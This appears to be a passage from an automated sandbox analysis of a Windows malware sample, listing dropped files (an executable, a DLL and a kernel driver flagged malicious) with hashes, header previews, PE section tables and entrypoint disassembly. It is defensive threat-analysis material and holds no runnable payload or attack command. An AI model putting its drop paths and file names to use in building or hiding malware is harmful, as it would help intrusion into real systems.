                                                                        Entropy (8bit):7.99273647746538
                                                                        Encrypted:true
                                                                        SSDEEP:1536:puwkqL5y4p4KnRWlENc3PGdLLv/PJctIJPc+pifyC:kQM4+B/MLL/PmaG
                                                                        MD5:DC44AE348E6A74B3A74871020FDFAC74
                                                                        SHA1:B223020A5F82FF15FD5E4930477F38F34C9CB919
                                                                        SHA-256:48F258037BE0FFE663DA3BCD47DBA22094CC31940083D9E18A71882BDC1ECDB8
                                                                        SHA-512:5FB13A8CE2206119C76325504DEF61D4277A73D71D79157AE564F326D6FC18080218633CE7C708F31A81D6CD1A5AD8A903CFE1CC0C57183B4809A9C12E32A429
                                                                        Malicious:false
                                                                        Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{|}~..a.....=..>.A

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\FOM-52[1].jpg

                                                                        Download File
                                                                        Process:C:\Users\user\Documents\ieiUC1.exe
                                                                        File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                                        Category:dropped
                                                                        Size (bytes):5062442
                                                                        Entropy (8bit):7.999518892518095
                                                                        Encrypted:true
                                                                        SSDEEP:98304:GIusCrIENkeXPV97kqmCf4P48E37aREUXr7VYyUOhez2IlpmURniNmJ:Xngv7NmCAPLTREQVb8/RomJ
                                                                        MD5:70C21DA900796B279A09040B00953E40
                                                                        SHA1:7CD3690B1FDDE033CD47E657FC4FC3A423DF716F
                                                                        SHA-256:901330243EF0F7F0AAE4F610693DA751873E5B632E5F39B98E3DB64859D78CBC
                                                                        SHA-512:851F4ED843F5D47C93D6C5A7D1895A674B6448631B567A0CCB2DF5873E4A5E722F28ECFC4D0D3220A86309481F9793FCDDA4F89BD993FB79CD09DBED29423752
                                                                        Malicious:false
                                                                        Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\drops[1].jpg

                                                                        Download File
                                                                        Process:C:\Users\user\Documents\ieiUC1.exe
                                                                        File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                        Category:dropped
                                                                        Size (bytes):37274
                                                                        Entropy (8bit):7.991781062764932
                                                                        Encrypted:true
                                                                        SSDEEP:768:6uBASoT9gu8yCOpS/DCNuoaa7SOjrX+ACdA7EtGKDRklnvga371DNpnN7s:fGSfyxENa7ZCRtxylnvgAVNI
                                                                        MD5:6D4DEB9526F3973DE0F9DCE9392F8EA7
                                                                        SHA1:520128FB9BAB7064BEA992E4427B924073E58C0E
                                                                        SHA-256:B415D73DC6CBEEE59736ADD1AF397B6982BDB2B3A9E994797EE6AF5979E58FD1
                                                                        SHA-512:F07E0DAEEE5C54BC8DB462630F46A339D9ED0AF346BAB113B4EC7FD2BC463AFC04CBD0FDFC8D9F54528B7127AA7735575A255B85F2D0B3CCD518FC5DC39BA447
                                                                        Malicious:false
                                                                        Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\FOM-53[1].jpg

                                                                        Download File
                                                                        Process:C:\Users\user\Documents\ieiUC1.exe
                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                                        Category:dropped
                                                                        Size (bytes):366410
                                                                        Entropy (8bit):7.375315637594966
                                                                        Encrypted:false
                                                                        SSDEEP:6144:XC/wwzn9iJzBFsJmUSmfXVz7pB+iMuVrt5DY:9ws7FsJmUSmd7pBpMgR58
                                                                        MD5:DA1D5EB665D3AAD523BE59415E6449ED
                                                                        SHA1:40C310E82035381410B83E4F1DA0A4410FEB8FE6
                                                                        SHA-256:F919634AC7E0877663FFF06EA9E430B530073D6E79EEE543D02331F4DFF64375
                                                                        SHA-512:6F179A166126C97444920636B584FB0BA4E9596A659921A2BCAA80E7DE094A87402D3E2B6D8DA8797045D7E22C3D37E6CED2A8E137E0387A1320D631B139FD36
                                                                        Malicious:false
                                                                        Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE.................IZ....OQPSS.U.WX..[..&6.ab.)eLghibkinoouqrsuuvw2zy{}}~.............

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\f[1].dat

                                                                        Download File
                                                                        Process:C:\Users\user\Documents\ieiUC1.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):879
                                                                        Entropy (8bit):4.5851931774575325
                                                                        Encrypted:false
                                                                        SSDEEP:6:JRSscjAQ7F3Y+ZcRC60rdimzYFAQT7LE/o2xjC:fSscjHRY+ZcRAdimzo/OY
                                                                        MD5:E54C4296F011EC91D935AA353C936E34
                                                                        SHA1:53A3313D40696E87C9B8CE2BE7E67BE49DD34C20
                                                                        SHA-256:81FF16AEDF9C5225CE8A03C0608CC3EA417795D98345699F2C240A0D67C6C33D
                                                                        SHA-512:5D1FBA60BE82A33341E5B9E7D3C1E7B0DCC9A41B4C1F97F2930141A808D62AF56D8697CB0D2FD4894A6080DF98A3E4EEF9D98A6003C292C588F547E1C6F84DE1
                                                                        Malicious:false
                                                                        Preview:.V.Wf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW11111111111111111111.BTE5k1=I=======.NXI9g%&A&&&&&&&NRRV%lyyKK..:{ggJ..J"+$-WEBXv941HD_R!|1=P.{r?_GBl(2%%%%%%%%%%%%%%%%%%%%%%%%%%%%%MQQU&ozzHH..9xddI..I!('.TFA[u:72KG\Q".2>S.xq<\D@n*0'''''''''''''''''''''''''''''OSSW$mxxJJ..;zffK..K#*%,VDCYw850IE^S }0<Q.zs>^FAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&NRRV%lyyKK..:{ggJ..J"+$-WEBXv941HD_R!|1=P.{r?_GAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&....&&&&....&&&&....&&&9\A\999999999999999999999M[ZV$3e.-goooooooooooooooooooooooooooooooooooooo...A23"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA45(-^.[N6><!K!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

                                                                        C:\Users\user\Documents\MsMpList.dat

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\183643586-388657435.07.exe
                                                                        File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                        Category:dropped
                                                                        Size (bytes):3889557
                                                                        Entropy (8bit):7.999938757087915
                                                                        Encrypted:true
                                                                        SSDEEP:98304:5AnkiLOZS/hpXbdHpPcG59BO8NQXIeXXv5L4f2fN3yQWF+A:endLOZS/DtpPJRO8OHBL4f2UQI+A
                                                                        MD5:8D66E87C6D27CF87F06EAFF45D6BFF51
                                                                        SHA1:6077F8BED71DA25C5AE5CA24462B70A206FFBAC3
                                                                        SHA-256:A9B37015822EBC333F945862B6DFC9FC57258EEB4BEABD6E17D8CA56915BB8B6
                                                                        SHA-512:12043500D431E33140D4CB84CB622039A184CE62842BBB70F33B495E616675ECD636586BE1F77403BF96E69E6A218783BBC36818D8B0CA0D41AEF44DEE1BEA01
                                                                        Malicious:false
                                                                        Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.QL.K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

                                                                        C:\Users\user\Documents\WordpadFilter.db

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\183643586-388657435.07.exe
                                                                        File Type:GIF image data, version 89a, 10 x 10
                                                                        Category:dropped
                                                                        Size (bytes):8228
                                                                        Entropy (8bit):7.978927277471326
                                                                        Encrypted:false
                                                                        SSDEEP:192:gBue6hKvTlByz2GqpoPTgyXrByFCt4lXp9tyey2Q0l:gBuNhyTlBU2dp+1XrBuCgp9vU0l
                                                                        MD5:FE29BFEC18FDBA3F1ACBE7E93420AAEF
                                                                        SHA1:DEEAC886DA548E08C50E5CCD4CFEE1DC30BF65D7
                                                                        SHA-256:8CEA7AB4AEA15E6254E3D6CA9DE5788741E3AFCF42F0CA93603AB24D25611EA6
                                                                        SHA-512:CFCD8A01BDFFA9A6F5B7BAAAFCB8DEC79B4DA91087DDAD488E907D1574CA0B88085D48F57AE5101CBA3582E84CE255A1902419CB21B0688F65B04E5119F4393C
                                                                        Malicious:false
                                                                        Preview:GIF89a.......,.'.........;.;G_fx5.#DV..g..}A/...l=.2......'o...!.....e.,t..o8.^...B^x..6I*X.DC.Oa..../_...n$_.y..+jb..r...Y4/Rv.....(;....$...g..........~.IN ...-<R7....eZ..q4.....~...}....~t<......|}....x.)U3.`U..s....W..WY..w+o-[..{..l..i`.:.......L'.>...$. .a.x.2#y_(9....d,....=n...%..*.c.........dq.nfLI....!1..2...`.,...~....)w.5E 1.V...0."...cu...p........^|@.-w..+...M.(.GK.y}.N.........}.....-..e.......X...GE.|.-._..*.M.....Mc........9/..fQ.Z.....W.....s...........k?C.q.u.-...Q..."..kt..A..128.......7#...~....1.`..:C.(.C.<y.(..<..'..+.!&.....r..I.....d...W.....-.'.Ec`Nv.8).....!....?.....\..N.3..D...U.....(..#sdY..D"...p.>.W.Q...}.. ..2.A('Q\_y...|..Az..JO.B.A..Q05.)..Q..zd..V..l......S.....dS.x....z^..z...).a.....4.G..........M.,..a..U...\....G...$...Q.7...@.x...x.s..R..0.-3...).x.D..f.I..n.....}..{.p.q.%,.lF.f.Up..UM..Y..1............R.....F.._....Y..u...e^.c...f.'..U.W1g..e#J...Z.W.....w.[...........R.?.m......"@.f..V..fxI

                                                                        C:\Users\user\Documents\ieiUC1.exe

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\183643586-388657435.07.exe
                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):133136
                                                                        Entropy (8bit):6.350273548571922
                                                                        Encrypted:false
                                                                        SSDEEP:3072:NtmH5WKiSogv0HSCcTwk7ZaxbXq+d1ftrt+armpQowbFqD:NYZEHG0yfTPFas+dZZrL9MD
                                                                        MD5:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                                                        SHA1:6281A108C7077B198241159C632749EEC5E0ECA8
                                                                        SHA-256:D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
                                                                        SHA-512:625F46D37BCA0F2505F46D64E7706C27D6448B213FE8D675AD6DF1D994A87E9CEECD7FB0DEFF35FDDD87805074E3920444700F70B943FAB819770D66D9E6B7AB
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.E.7w+.7w+.7w+...V.?w+...E..w+...F.Qw+...P.5w+.>...>w+.7w*..w+...Y.>w+...W.6w+...S.6w+.Rich7w+.........PE..d...Kd.]..........#......*..........P].........@............................................................................................,...x...............,........H...........D...............................................@..@............................text...*).......*.................. ..`.rdata..x_...@...`..................@..@.data....:..........................@....pdata..,...........................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\Documents\vselog.dll

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\183643586-388657435.07.exe
                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):122880
                                                                        Entropy (8bit):6.0020333125706165
                                                                        Encrypted:false
                                                                        SSDEEP:1536:Jd4E7qItA4nbQ0R3rh4Q8/0fp0uQ4S8S7YDLbnTPtrTzvesW7dj9dl4Cp52Fy:Jf7qG3Gyp0p4ZmGLbTPJT7y7aCp5gy
                                                                        MD5:D330BD09CC492EB380C6C0367D3207D6
                                                                        SHA1:F4CB9287174AF049C1F9528A8A83C7C7109E764E
                                                                        SHA-256:23967F225121943834BD7B2C77CC6F6BF0FEAB829088F24431124F1E13AA2CB6
                                                                        SHA-512:33ED01E810E2E86B98F3C55EB9E0F68779339B3A6C1BCFE2126E40E3AD3AAA97FBBDBD81A57DE2FE6F38D2E4183EBDF90982D58B2CAA409AF97311DEBD147191
                                                                        Malicious:true
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d... .E .E .Ek..D%.Ek..D..Ek..D*.E0N.D).E0N.D..E0N.D..Ek..D#.E .EB.EhO.D!.EhO.D!.EhOHE!.E . E!.EhO.D!.ERich .E........PE..d....w.g.........." ...).....................................................0............`.........................................`...........(.......H.................... ..x... ...8...............................@............ ...............................text............................... ..`.rdata....... ......................@..@.data...0...........................@....pdata..............................@..@.rsrc...H...........................@..@.reloc..x.... ......................@..B........................................................................................................................................................................................................................................

                                                                        C:\Users\Public\Music\destopbak.ini

                                                                        Download File
                                                                        Process:C:\Users\user\Documents\ieiUC1.exe
                                                                        File Type:MIPSEB MIPS-III ECOFF executable
                                                                        Category:modified
                                                                        Size (bytes):2
                                                                        Entropy (8bit):1.0
                                                                        Encrypted:false
                                                                        SSDEEP:3:s:s
                                                                        MD5:7E74F75663E5B5A4F3452A4C603EE45D
                                                                        SHA1:D5114B086B721F2C87EA7152025792958AB4C629
                                                                        SHA-256:DD1E2826C0124A6D4F7397A5A71F633928926C0608B62FB9E615BA778ACC39FF
                                                                        SHA-512:2F5D0D45593487BEBC2CCF968EAF2A4A3BDE1D5A29C7C2B5AD411E041C0D3B7A46BE439ED7083093057A96030683B9DEFBED1A2EF7882B3E64CF3FBC7C9CF12F
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:.@

                                                                        C:\Windows\System32\drivers\189atohci.sys

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\183643586-388657435.07.exe
                                                                        File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):28272
                                                                        Entropy (8bit):6.2290460216005945
                                                                        Encrypted:false
                                                                        SSDEEP:384:z3YUY30d1Kgf4AtcTmwZ/22a97C5ohYh3IB96Oys2+l0skiM0HMFrba8no0ceD/7:zOUkgfdZ9pRyv+uPzCMHo3q4tDgh1
                                                                        MD5:30251EB82C8FB678B3261069FE1ED707
                                                                        SHA1:5B955F5DD5311BCC46F87AEBCF13170689EBAF02
                                                                        SHA-256:1524E510871CE8FE5C3BE57D57C4C1708F65EFC43A622F2B99C29F5005B9125B
                                                                        SHA-512:E03CA53E4C67E7E40BFD431EE8F2FEDD8B29067477ED2EEA6807A5D9498DA2CF5F63780D7F6AE87C5E643B5C4AE8A101D9F06023B445FAF46A281039FA9994F6
                                                                        Malicious:true
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ri...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:Rich...:........................PE..d....S.V.........."......:..........l...........................................................................................................(............`.......P..p.......D....A...............................................@...............................text....,.......................... ..h.rdata.......@.......2..............@..H.data........P.......:..............@....pdata.......`.......<..............@..HPAGE....l....p.......>.............. ..`INIT.................@.............. ....rsrc................J..............@..B.reloc...............N..............@..B........................................................................................................................................................................................

                                                                        C:\xxxx.ini

                                                                        Download File
                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):2
                                                                        Entropy (8bit):1.0
                                                                        Encrypted:false
                                                                        SSDEEP:3:y:y
                                                                        MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                                        SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                                        SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                                        SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                                        Malicious:false
                                                                        Preview:..

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                        Entropy (8bit):0.1090879808369659
                                                                        TrID:
                                                                        • Win64 Executable GUI (202006/5) 92.65%
                                                                        • Win64 Executable (generic) (12005/4) 5.51%
                                                                        • Generic Win/DOS Executable (2004/3) 0.92%
                                                                        • DOS Executable Generic (2002/1) 0.92%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:183643586-388657435.07.exe
                                                                        File size:30'948'864 bytes
                                                                        MD5:edae96658a4b8891aa1f35bab79b1179
                                                                        SHA1:851f9ef8de5b497ba16fa12a1b02534c821fda64
                                                                        SHA256:d45ab0d352d221a239e019d3f04f5e85029a023ef80c8e616b91ea490bf232cd
                                                                        SHA512:8198e118e702cd672ada26cf8bfd4a72a06f542536e53324563d38929a8cf384e2f377b0cd4f039fb7ae52ab0751e1c31cafbd350c0e3920c4934609c72b6601
                                                                        SSDEEP:3072:RfTcz3mBVQoYp2VK+eTCp/ovBurp+1zJL5abMzNgOcd5JE:xUYiP2VMTsoTLUe7
                                                                        TLSH:53676B46A291E0E4D02A8A39C89192F597727C71C72197DF06E8BD57FE372D08D3AB70
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............j...j...j.......j.......j......+j.......j.......j.......j.......j...j...j.......j.......j...j`..j.......j..Rich.j.........

                                                                        File Icon

                                                                        Icon Hash:0c89255b4979770c

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x140004e88
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x140000000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                        DLL Characteristics:HIGH_ENTROPY_VA, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x15DA06B8 [Fri Aug 14 04:08:24 1981 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:6
                                                                        OS Version Minor:0
                                                                        File Version Major:6
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:6
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:bc73cef090bcf1a4fda3709bca813380

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        dec eax
                                                                        sub esp, 28h
                                                                        call 00007F1658C32BB0h
                                                                        dec eax
                                                                        add esp, 28h
                                                                        jmp 00007F1658C2EA25h
                                                                        int3
                                                                        int3
                                                                        inc eax
                                                                        push ebx
                                                                        dec eax
                                                                        sub esp, 20h
                                                                        dec eax
                                                                        mov ebx, ecx
                                                                        jmp 00007F1658C327A1h
                                                                        dec eax
                                                                        mov ecx, ebx
                                                                        call 00007F1658C36BEEh
                                                                        test eax, eax
                                                                        je 00007F1658C327A5h
                                                                        dec eax
                                                                        mov ecx, ebx
                                                                        call 00007F1658C36C46h
                                                                        dec eax
                                                                        test eax, eax
                                                                        je 00007F1658C32779h
                                                                        dec eax
                                                                        add esp, 20h
                                                                        pop ebx
                                                                        ret
                                                                        dec eax
                                                                        cmp ebx, FFFFFFFFh
                                                                        je 00007F1658C32798h
                                                                        call 00007F1658C33094h
                                                                        int3
                                                                        call 00007F1658C330AEh
                                                                        int3
                                                                        jmp 00007F1658C36C2Ch
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        inc eax
                                                                        push ebx
                                                                        dec eax
                                                                        sub esp, 20h
                                                                        dec eax
                                                                        mov ebx, ecx
                                                                        xor ecx, ecx
                                                                        call dword ptr [000101FFh]
                                                                        dec eax
                                                                        mov ecx, ebx
                                                                        call dword ptr [000101EEh]
                                                                        call dword ptr [000101F8h]
                                                                        dec eax
                                                                        mov ecx, eax
                                                                        mov edx, C0000409h
                                                                        dec eax
                                                                        add esp, 20h
                                                                        pop ebx
                                                                        dec eax
                                                                        jmp dword ptr [000101ECh]
                                                                        dec eax
                                                                        mov dword ptr [esp+08h], ecx
                                                                        dec eax
                                                                        sub esp, 38h
                                                                        mov ecx, 00000017h
                                                                        call dword ptr [000101E0h]
                                                                        test eax, eax
                                                                        je 00007F1658C32799h
                                                                        mov ecx, 00000002h
                                                                        int 29h
                                                                        dec eax
                                                                        lea ecx, dword ptr [0001BC26h]
                                                                        call 00007F1658C3283Eh
                                                                        dec eax
                                                                        mov eax, dword ptr [esp+38h]
                                                                        dec eax
                                                                        mov dword ptr [0001BD0Dh], eax
                                                                        dec eax
                                                                        lea eax, dword ptr [esp+38h]

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x1f2ec0x8c.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x1d7e0000xa424.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1d7c0000xff0.pdata
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1d890000x68c.reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x1dd300x70.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1dbf00x140.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x150000x2e8.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x10000x133600x134002a0a4f6081906c58e4bc8a7a9b4b97c9False0.5661018668831169data6.454410162864766IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .rdata0x150000xad020xae00f151ce48032ae299bac14beeeba25bdcFalse0.44744522270114945data4.862498902021113IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .data0x200000x1d5bd880x1d598005bc6ffbb17ede3000522602be4b9b1a3unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .pdata0x1d7c0000xff00x1000b2746c747472a28004da10ee1b2e6b7fFalse0.489013671875data4.961410380923068IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        _RDATA0x1d7d0000x15c0x2004418e12ae4112eba1746ee841d5d14aeFalse0.390625data2.818769508818952IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .rsrc0x1d7e0000xa4240xa600f321d71d46c3295fb843aef751fe2370False0.45488987198795183data6.428766429392483IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .reloc0x1d890000x68c0x8005d2fc37e7be922917e0b1fe6cdbdd3f1False0.505859375data4.966332431937649IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                        RT_ICON0x1d7e2f80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 0EnglishUnited States0.22236655644780348
                                                                        RT_ICON0x1d825200x98fPNG image data, 24 x 24, 8-bit/color RGBA, non-interlacedEnglishUnited States0.7159787494891704
                                                                        RT_ICON0x1d82eb00x9e7PNG image data, 32 x 32, 8-bit/color RGBA, non-interlacedEnglishUnited States0.7317554240631163
                                                                        RT_ICON0x1d838980xbddPNG image data, 40 x 40, 8-bit/color RGBA, non-interlacedEnglishUnited States0.7728021073427724
                                                                        RT_ICON0x1d844780xcacPNG image data, 48 x 48, 8-bit/color RGBA, non-interlacedEnglishUnited States0.7919235511713933
                                                                        RT_ICON0x1d851240xdcbPNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8088360237892949
                                                                        RT_ICON0x1d85ef00x1b13PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8928004616938393
                                                                        RT_RCDATA0x1d87a040x72dataEnglishUnited States0.6754385964912281
                                                                        RT_RCDATA0x1d87a780x12dataEnglishUnited States1.2777777777777777
